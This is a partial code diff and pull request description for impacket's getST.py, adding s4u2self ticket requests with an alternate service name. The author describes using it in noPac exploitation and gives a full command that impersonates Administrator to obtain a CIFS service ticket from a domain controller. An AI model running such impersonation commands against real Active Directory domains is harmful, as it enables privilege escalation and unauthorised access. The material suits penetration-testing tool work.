+            self.components = alt_service.split('/')
         return self
 
     def components_to_asn1(self, name):
@@ -243,7 +245,7 @@ class Ticket(object):
         return component
 
     def __str__(self):
-        return "<Ticket for %s vno %s>" % (str(self.service_principal), str(self.encrypted_part.kvno)) 
+        return "<Ticket for %s vno %s>" % (str(self.service_principal), str(self.encrypted_part.kvno))
 
 class KerberosTime(object):
     INDEFINITE = datetime.datetime(1970, 1, 1, 0, 0, 0)


### PR DESCRIPTION
I'm playing with no-pac exploitation recently, the last step is doing a s4u2self request, and we don't need to do s4u2proxy request.
But I found that impacket's getST.py has no support for this, and it doesn't support service modification of the returned TGS ticket.
Even there is a feature called AnySPN in impacket, but it won't work in this special situation
here is the result of smbclient.py before my modification to getST.py
![image](https://user-images.githubusercontent.com/48377190/154676983-551255fd-98ac-49ff-bc75-5b9b5894a329.png)

after I made some changes to getST.py, I'm able to get a service ticket with the SPN I specified in the command line


`getST.py my.domain/WIN-ER6H1V81DV9 -no-pass -k -dc-ip 192.168.25.177 -impersonate Administrator -alt-service CIFS/WIN-ER6H1V81DV9.my.domain -s4u2self  -spn WIN-ER6H1V81DV9 -debug`
smbclient.py works just fine
![image](https://user-images.githubusercontent.com/48377190/154677510-fbaaf4db-a95a-4f79-abcb-5c73f49bedc8.png)
